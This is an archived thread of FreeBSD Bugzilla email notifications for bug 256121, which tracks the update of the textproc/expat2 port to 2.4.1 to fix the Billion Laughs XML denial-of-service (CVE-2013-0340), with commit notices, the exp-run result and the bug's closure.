Discussion:
[Bug 256121] [exp-run] texproc/expat2: update to 2.4.1 (fixes CVE-2013-0340/CWE-776)
b***@freebsd.org
2021-05-24 14:42:55 UTC
Permalink
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=256121

Bug ID: 256121
Summary: [exp-run] texproc/expat2: update to 2.4.1 (fixes
CVE-2013-0340/CWE-776)
Product: Ports & Packages
Version: Latest
Hardware: Any
OS: Any
Status: New
Severity: Affects Only Me
Priority: ---
Component: Individual Port(s)
Assignee: ***@FreeBSD.org
Reporter: ***@freebsd.org
CC: ***@FreeBSD.org
Flags: exp-run?

Created attachment 225223
--> https://bugs.freebsd.org/bugzilla/attachment.cgi?id=225223&action=edit
v1

Moin moin

desktop@ would like to ask for an exp-run to update textproc/expat2 to 2.4.1
which includes a fix against the billion laughs attach CVE-2013-0340/CWE-776.

The patch is attached and can also be found here:
https://people.freebsd.org/~tcberner/patches/0001-textprox-expat2-update-to-2.4.1-fixes-CVE-2013-0340-.patch

mfg Tobias
--
You are receiving this mail because:
You are on the CC list for the bug.
b***@freebsd.org
2021-05-24 15:03:43 UTC
Permalink
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=256121

--- Comment #1 from commit-***@FreeBSD.org ---
A commit in branch main references this bug:

URL:
https://cgit.FreeBSD.org/ports/commit/?id=4ff544422ffe21f039595fc312b2e4bff39a705c

commit 4ff544422ffe21f039595fc312b2e4bff39a705c
Author: Tobias C. Berner <***@FreeBSD.org>
AuthorDate: 2021-05-24 15:02:45 +0000
Commit: Tobias C. Berner <***@FreeBSD.org>
CommitDate: 2021-05-24 15:02:45 +0000

security/vuxml: document vulnerability in texptroc/expat2

Security: CVE-2013-0340
PR: 256121

security/vuxml/vuln.xml | 34 ++++++++++++++++++++++++++++++++++
1 file changed, 34 insertions(+)
--
You are receiving this mail because:
You are on the CC list for the bug.
b***@freebsd.org
2021-05-27 08:26:56 UTC
Permalink
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=256121

Antoine Brodin <***@FreeBSD.org> changed:

What |Removed |Added
----------------------------------------------------------------------------
Flags|exp-run? |exp-run+
Assignee|***@FreeBSD.org |***@freebsd.org

--- Comment #2 from Antoine Brodin <***@FreeBSD.org> ---
Exp-run looks fine
--
You are receiving this mail because:
You are on the CC list for the bug.
b***@freebsd.org
2021-05-27 08:58:07 UTC
Permalink
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=256121

--- Comment #3 from commit-***@FreeBSD.org ---
A commit in branch main references this bug:

URL:
https://cgit.FreeBSD.org/ports/commit/?id=1454ab40206b85f94edb6390e0d96c9716a07399

commit 1454ab40206b85f94edb6390e0d96c9716a07399
Author: Tobias C. Berner <***@FreeBSD.org>
AuthorDate: 2021-05-24 14:38:28 +0000
Commit: Tobias C. Berner <***@FreeBSD.org>
CommitDate: 2021-05-27 08:56:26 +0000

textprox/expat2: update to 2.4.1 -- fixes CVE-2013-0340/CWE-776

See [1] for details:
Expat 2.4.0 and follow-up release 2.4.1 have both been released
earlier
today (21-05-23). Release 2.4.0 fixes long known security issue
CVE-2013-0340 by
adding protection against so-called Billion Laughs Attacks, a form
of
denial of service against applications accepting XML input, in all
known
variations, including recent flavor Parameter Laughs.

[1]
https://blog.hartwork.org/posts/cve-2013-0340-billion-laughs-fixed-in-expat-2-4-0

PR: 256121
Exp-run by: antoine

textproc/expat2/Makefile | 4 +++-
textproc/expat2/distinfo | 6 +++---
textproc/expat2/pkg-plist | 10 +++++-----
3 files changed, 11 insertions(+), 9 deletions(-)
--
You are receiving this mail because:
You are on the CC list for the bug.
b***@freebsd.org
2021-05-27 09:00:39 UTC
Permalink
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=256121

Tobias C. Berner <***@freebsd.org> changed:

What |Removed |Added
----------------------------------------------------------------------------
Resolution|--- |FIXED
Status|New |Closed

--- Comment #4 from Tobias C. Berner <***@freebsd.org> ---
Committed - thanks for the exp-run.
--
You are receiving this mail because:
You are on the CC list for the bug.
Loading...